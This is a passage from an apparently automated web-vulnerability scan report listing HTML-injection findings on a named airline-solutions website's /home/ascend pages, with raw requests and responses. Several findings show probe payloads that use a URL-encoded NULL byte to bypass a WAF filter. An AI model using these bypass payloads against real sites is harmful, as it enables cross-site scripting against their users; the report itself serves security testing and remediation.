Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321376; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:43:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321376; expires=Thu, 06-Oct-2011 09:43:03 GMT; path=/
Set-Cookie: exp_last_activity=1286376183; expires=Thu, 06-Oct-2011 09:43:03 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:43:23 GMT
Pragma: no-cache
Content-Length: 7195
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/contact/?%004de66"><a>0fefd7fbea2=1">
...[SNIP]...

3.23. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a22d0<a>06115c6fe74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a22d0<a>06115c6fe74 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue?%00a22d0<a>06115c6fe74=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321374; expires=Thu, 06-Oct-2011 09:40:34 GMT; path=/
Set-Cookie: exp_last_activity=1286376034; expires=Thu, 06-Oct-2011 09:40:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:41:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>06115c6fe74=1">current issue?%00a22d0<a>06115c6fe74=1</a>
...[SNIP]...

3.24. http://www.sabreairlinesolutions.com/home/ascend/current_issue [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00831a1"><a>5e23834186a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 831a1"><a>5e23834186a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue?%00831a1"><a>5e23834186a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321374; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:36:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321374; expires=Thu, 06-Oct-2011 09:36:47 GMT; path=/
Set-Cookie: exp_last_activity=1286375807; expires=Thu, 06-Oct-2011 09:36:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/current_issue?%00831a1"><a>5e23834186a=1">
...[SNIP]...

3.25. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a38d2<a>7129be221ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a38d2<a>7129be221ae in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue/?%00a38d2<a>7129be221ae=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:40:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321334; expires=Thu, 06-Oct-2011 09:40:36 GMT; path=/
Set-Cookie: exp_last_activity=1286376035; expires=Thu, 06-Oct-2011 09:40:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:40:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>7129be221ae=1">?%00a38d2<a>7129be221ae=1</a>
...[SNIP]...

3.26. http://www.sabreairlinesolutions.com/home/ascend/current_issue/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/current_issue/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f7df5"><a>b84f3cf75c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7df5"><a>b84f3cf75c1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/current_issue/?%00f7df5"><a>b84f3cf75c1=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321334; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:35:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321334; expires=Thu, 06-Oct-2011 09:36:04 GMT; path=/
Set-Cookie: exp_last_activity=1286375763; expires=Thu, 06-Oct-2011 09:36:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/current_issue/?%00f7df5"><a>b84f3cf75c1=1">
...[SNIP]...

3.27. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b96d0<a>59e01a505f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b96d0<a>59e01a505f3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error?%00b96d0<a>59e01a505f3=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend/error/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:55:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_last_activity=1286376933; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:55:52 GMT
Pragma: no-cache
Content-Length: 7054
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>59e01a505f3=1">error?%00b96d0<a>59e01a505f3=1</a>
...[SNIP]...

3.28. http://www.sabreairlinesolutions.com/home/ascend/error [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0073d52"><a>132b3839ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73d52"><a>132b3839ba7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error?%0073d52"><a>132b3839ba7=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend/error/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:51:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 09:51:32 GMT; path=/
Set-Cookie: exp_last_activity=1286376692; expires=Thu, 06-Oct-2011 09:51:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:51:49 GMT
Pragma: no-cache
Content-Length: 7058
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/error?%0073d52"><a>132b3839ba7=1">
...[SNIP]...

3.29. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00a1fc9<a>54ce38393eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1fc9<a>54ce38393eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error/?%00a1fc9<a>54ce38393eb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:46:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 09:46:06 GMT; path=/
Set-Cookie: exp_last_activity=1286376366; expires=Thu, 06-Oct-2011 09:46:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:46:24 GMT
Pragma: no-cache
Content-Length: 7094
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>54ce38393eb=1">?%00a1fc9<a>54ce38393eb=1</a>
...[SNIP]...

3.30. http://www.sabreairlinesolutions.com/home/ascend/error/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/error/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007d0b4"><a>0bfb3bd1f3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0b4"><a>0bfb3bd1f3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/error/?%007d0b4"><a>0bfb3bd1f3c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/includes/ascend_confirm.php
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:42:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 09:42:08 GMT; path=/
Set-Cookie: exp_last_activity=1286376127; expires=Thu, 06-Oct-2011 09:42:08 GMT; path=/
